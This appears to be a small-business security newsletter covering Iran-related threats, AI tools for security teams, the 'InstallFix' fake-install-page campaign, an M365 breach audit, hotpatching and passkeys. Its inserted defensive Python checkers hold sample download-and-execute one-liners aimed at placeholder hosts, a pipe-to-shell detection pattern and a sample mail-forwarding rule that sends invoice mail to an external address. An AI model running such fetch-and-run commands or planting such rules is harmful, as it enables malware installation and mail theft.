
Iran War: Prepare for New Cyber Risks
The Multi-State Information Sharing and Analysis Center (MS-ISAC) warns that U.S. state and local groups face a wave of "low-level cyber activity." This follows recent U.S. and Israeli military strikes in Iran.
Why it matters: While these groups are the primary targets, SMBs often share the same digital space and face similar risks.
The big picture: Even if your business is not a direct target, geopolitical tension often leads to a rise in automated and opportunistic attacks. While large companies are the major targets, SMBs are often used as "entry points" because they typically have smaller security budgets and fewer defenses.
The details: Experts expect a rise in specific types of digital threats:
DDoS attacks: These flood your website or network with traffic to knock it offline.
Website defacement: Hackers change the look of your site to spread messages.
Data leaks: Increased attempts to steal info about employees or organizations.
What you can do: Use this moment to check your passive, preventative controls, such as:
Patch your systems: Ensure all software is up to date, especially VPNs and routers.
Use firewalls: Strong firewalls can stop most low-level attacks.
Clean up your data: Limit what information about your staff is public. Encourage employees to review and scrub social media accounts for sensitive details.
Verify inputs: Check data from web forms to prevent "SQL injection" attacks.
Deploy phish-resistant MFA: Mitigates most account takeover threats.
Keep paper copies: Print out your most critical documents in case your cloud services or internet go down.
The bottom line: Even if we haven’t seen major attacks on local systems yet, the risk is real. Now is the time to harden your defenses before the situation changes.
AI tools boost security for small teams
The big picture: Security work involves a lot of reading, writing, and coding. Modern AI tools are becoming essential "co-pilots." They help you analyze alerts, make sense of complex security logs, and write scripts without needing a full team of developers.
Why it matters: Small and medium businesses (SMBs) often lack the huge budgets of large corporations. Using Large Language Models (LLMs) like Claude or ChatGPT can help IT professionals automate boring tasks and analyze data faster.
Practical ways to use LLMs
Analyzing code and logs: You can feed snippets of suspicious code or server logs into an AI to find errors or signs of an attack quickly.
Writing scripts: If you need a Python script to automate a security check but don’t have time to write it from scratch, an LLM can generate a working draft in seconds.
Drafting documents: Use AI to help write security policies or employee training guides. This saves hours of manual writing.
Learning on the fly: When you encounter a new type of cyber threat, you can ask an LLM to explain the concept in simple terms.
Yes, but: While these tools are powerful, they aren't perfect. They can sometimes give wrong answers, known as "hallucinations." Always verify the code or advice an AI gives you before applying it to your live systems.
What to do now
Pick a tool: Start with a well-known AI like Claude or ChatGPT to see how it handles your daily tasks.
Protect your data: Never upload sensitive company secrets, passwords, or customer private data into a public AI tool.
Review everything: Treat AI output like a draft from an intern. Check it for mistakes before you use it.
Go deeper: For some example prompts, check out https://dispatch.thorcollective.com/p/how-i-use-llms-for-security-work
InstallFix: Malicious ads mimic software guides
The big picture: A new cyberattack called “InstallFix” is tricking people into installing malware. Attackers create fake websites that look exactly like real software help pages. They use Google ads to make these fake pages show up at the top of search results.
How it works: When you search for popular tools, like AI coding assistants, you might see a sponsored link. If you click it, you land on a page that looks official. The page tells you to copy a line of code and paste it into your computer's command terminal to install the software.
The trap: The code you copy doesn't install software. Instead, it downloads a "stealer" virus.
The goal: This virus steals your saved passwords, web cookies, and login details.
Why it matters: This attack is hard to stop because it doesn't use email, so it skips your email filters. Because you are the one asking to install the software, your computer’s security tools might not realize anything is wrong until it is too late.
What you can do:
Check the URL: Before you copy any commands, look closely at the web address. Make sure it is the official site (like anthropic.com or github.com).
Skip the ads: Don't click on sponsored search results for software. Scroll down to the organic results or go directly to the official website.
Verify the code: If a command asks your computer to download something from a weird or long web link, don't run it.
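The three checks above (official URL, no ad-driven shortcuts, don't run download-and-execute one-liners from odd links) can be applied mechanically before anything is pasted into a terminal. The following is an added example, not code from the article or from Push Security; the allowlist holds only the two official domains the article names, and the sample commands and their domains are constructed for illustration.

```python
import re
from urllib.parse import urlparse

# Allowlist of official download hosts; the article names these two as examples.
OFFICIAL_DOMAINS = {"anthropic.com", "github.com"}

# Constructed sample "install" commands of the kind a fake help page might show.
# The non-allowlisted hosts use the reserved .example TLD and are not real indicators.
SAMPLE_COMMANDS = [
    "curl -fsSL https://github.com/example-org/tool/install.sh | sh",
    "curl -sL http://8f2k-setup-guide.example/cli.sh | bash",
    'powershell -c "irm http://free-ai-helper.example/x | iex"',
    "pip install example-cli",
]

URL_RE = re.compile(r"""https?://[^\s"'|;)]+""", re.IGNORECASE)
# A URL followed by a pipe into a shell interpreter: fetch-and-run in one step.
PIPE_TO_SHELL_RE = re.compile(r"\|\s*(sh|bash|zsh|iex|Invoke-Expression)\b", re.IGNORECASE)


def _is_official(host):
    host = host.lower()
    return any(host == d or host.endswith("." + d) for d in OFFICIAL_DOMAINS)


def review_command(cmd):
    """Return the list of findings for a command a web page asked the user to paste."""
    findings = []
    urls = URL_RE.findall(cmd)
    if urls and PIPE_TO_SHELL_RE.search(cmd):
        findings.append("download-and-execute")
    for url in urls:
        parsed = urlparse(url)
        host = (parsed.hostname or "").lower()
        if parsed.scheme.lower() != "https":
            findings.append("plain-http")
        if not _is_official(host):
            findings.append(f"unofficial-host:{host}")
    return findings


def verdict(cmd):
    """'ok' = nothing found; 'review' = fetches and runs a script from an official host;
    'do-not-run' = fetches from a host that is not on the allowlist or over plain HTTP."""
    findings = review_command(cmd)
    if not findings:
        return "ok"
    if all(f == "download-and-execute" for f in findings):
        return "review"
    return "do-not-run"
```

Extend OFFICIAL_DOMAINS with the vendors your team actually installs from; a host missing from the list means "stop and check the vendor's real site", not "definitely malicious".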
The bottom line: Cybercriminals are getting better at looking professional. Always double-check where you are getting your software before you run any commands on your machine.
Go deeper: https://pushsecurity.com/blog/installfix
A $71K lesson in Microsoft 365 security
The big picture: Weak security settings in Microsoft 365 (M365) led to a $71,000 theft and a data breach involving children's personal information at Western Australian government agencies. A recent audit found that basic safety tools were either missing or turned off.
Why it matters: For SMB IT professionals, this is a clear warning. Many of these issues come from "out-of-the-box" settings that are too permissive. If you don't tighten these controls, adversaries have a higher chance of breaching your environment.
Key details
The $71k theft: Hackers used weak Multi-Factor Authentication (MFA) to log in from overseas. They set up hidden email rules to watch the inbox and eventually sent fake invoices that were paid by mistake.
The data breach: One agency sent sensitive data about 32 people, including minors, to a third party. Because they had no Data Loss Prevention (DLP) tools, they couldn't see what was stolen or stop it.
Shadow IT: Employees were allowed to sync work data to personal accounts on Dropbox and Google Drive, creating huge gaps in data control.
Unvetted apps: Staff could install unapproved Teams apps and external code, which could hide malware.
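The hidden email rules in the $71k theft are a detectable pattern: rules that forward finance mail outside the organisation, or hide it in a folder nobody reads, under a blank or one-character name. The following is an added example, not code from the audit or from Microsoft; the rule records are constructed, with field names loosely modelled on the properties Exchange Online's Get-InboxRule cmdlet reports, and the internal domain and addresses are placeholders.

```python
# Folders an attacker commonly moves stolen mail into so the victim never sees it.
SUSPECT_FOLDERS = {"rss feeds", "rss subscriptions", "conversation history",
                   "archive", "deleted items", "junk email"}
# Keywords typical of the invoice-fraud mail the article describes.
FINANCE_WORDS = {"invoice", "payment", "remittance", "bank", "wire", "account"}

# Constructed sample rules (an export of one mailbox's inbox rules, not real data).
SAMPLE_RULES = [
    {"Name": "Newsletters", "Enabled": True, "ForwardTo": [], "MoveToFolder": "Reading",
     "DeleteMessage": False, "SubjectContainsWords": ["newsletter"], "MarkAsRead": False},
    {"Name": ".", "Enabled": True, "ForwardTo": ["finance.updates@external-mail.example"],
     "MoveToFolder": "RSS Feeds", "DeleteMessage": False,
     "SubjectContainsWords": ["invoice", "payment"], "MarkAsRead": True},
    {"Name": "Cleanup", "Enabled": True, "ForwardTo": [], "MoveToFolder": None,
     "DeleteMessage": True, "SubjectContainsWords": ["remittance"], "MarkAsRead": False},
]


def audit_rule(rule, internal_domain):
    """Return human-readable findings for one inbox rule; empty list means nothing suspicious."""
    findings = []
    for addr in rule.get("ForwardTo", []) + rule.get("RedirectTo", []):
        if addr.rsplit("@", 1)[-1].lower() != internal_domain.lower():
            findings.append(f"forwards to external address {addr}")
    keywords = {w.lower() for w in rule.get("SubjectContainsWords", []) + rule.get("BodyContainsWords", [])}
    hits = keywords & FINANCE_WORDS
    folder = (rule.get("MoveToFolder") or "").lower()
    hides = bool(rule.get("DeleteMessage")) or folder in SUSPECT_FOLDERS
    if hits and hides:
        findings.append(f"hides finance-related mail ({', '.join(sorted(hits))})")
    if rule.get("MarkAsRead") and hides:
        findings.append("marks mail read before hiding it")
    if len(rule.get("Name", "").strip(" .,-_")) < 2:
        findings.append("rule name is blank or a single character")
    return findings


def audit_rules(rules, internal_domain):
    """Map each enabled rule name to its findings, keeping only rules with at least one."""
    report = {}
    for rule in rules:
        if not rule.get("Enabled", True):
            continue
        findings = audit_rule(rule, internal_domain)
        if findings:
            report[rule["Name"]] = findings
    return report
```

Run this over every mailbox's rules after an MFA bypass is suspected, and again on a schedule: a rule that appears between runs is the earliest sign of the inbox monitoring described above.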
What to do next
Enforce phishing-resistant MFA: Move away from SMS, email codes, or one-time passwords (OTP). Use hardware keys or passkeys to stop adversaries from hijacking accounts.
Turn on DLP: Set up Data Loss Prevention rules in M365 to flag or block emails containing ID numbers, health records, or financial data.
Audit guest access: Review your settings to ensure only admins can invite guests to your digital workspace.
Block personal storage: Use technical controls to prevent staff from moving work files to personal cloud accounts.
Microsoft to enable Windows Hotpatching by default
The big picture: Starting in May 2026, Microsoft will turn on Hotpatch security updates by default for all eligible Windows devices managed via Microsoft Intune or Graph API. This change allows devices to install security fixes without requiring a restart.
Why it matters: For SMB IT and security pros, patching is often a race against time.
Faster compliance: Data shows that hotpatching helps organizations reach 90% patch compliance in half the time compared to traditional methods.
Less downtime: Because updates apply in memory, users aren't forced to reboot in the middle of their workday.
Reduced risk: Faster patching closes security gaps before attackers can exploit them.
How it works: Hotpatching works by updating code in a running process without needing to restart the OS.
The Baseline: Every three months, a baseline update is released that does require a reboot.
The Hotpatch: In the months between baselines, security updates are applied hot (no restart required).
Yes, but: This feature requires specific prerequisites. Devices that don't meet these requirements will continue to use the standard restart-required method.
Windows Hello to support passkeys
The big picture: Microsoft is making it harder for adversaries to steal your login info. Soon, you can use Windows Hello (face, fingerprint, or PIN) to sign in to Microsoft Entra apps using a Windows device-bound passkey.
Why it matters: Adversaries often use fake websites to steal passwords and weak MFA challenge answers. This is called phishing. Passkeys are much safer because they stay on your specific device. They don't work on fake sites, which keeps your account safe.
How it works:
No password needed: Users sign in using the same PIN or scan they use for their laptop.
Works anywhere: You can use these passkeys on managed company PCs or unmanaged personal devices.
One device, many accounts: A user can have separate passkeys for multiple Entra accounts on the same computer.
Stays put: These passkeys are "device-bound." They don't sync to the cloud, so they can’t be stolen from another machine.
When: Public preview starts in mid-March 2026. It will be fully available by mid-April 2026.
Is It Automatic? No. This feature is off by default. You must opt in and change your settings to use it.
Current Limits: During the preview, you have to manually add specific ID codes (AAGUIDs) for Windows Hello to your allowed list in the Entra portal.
What’s next: If you want to try this, go to Authentication Methods in the Microsoft Entra admin center. You’ll need to enable "Passkeys (FIDO2)" and create a profile for your users. If you aren't ready to change how your team signs in, you don't need to do anything right now.
Go deeper: https://mc.merill.net/message/MC1247893
If you have any comments or feedback, just respond to this email!
Thanks for reading and stay secure,
Aaron
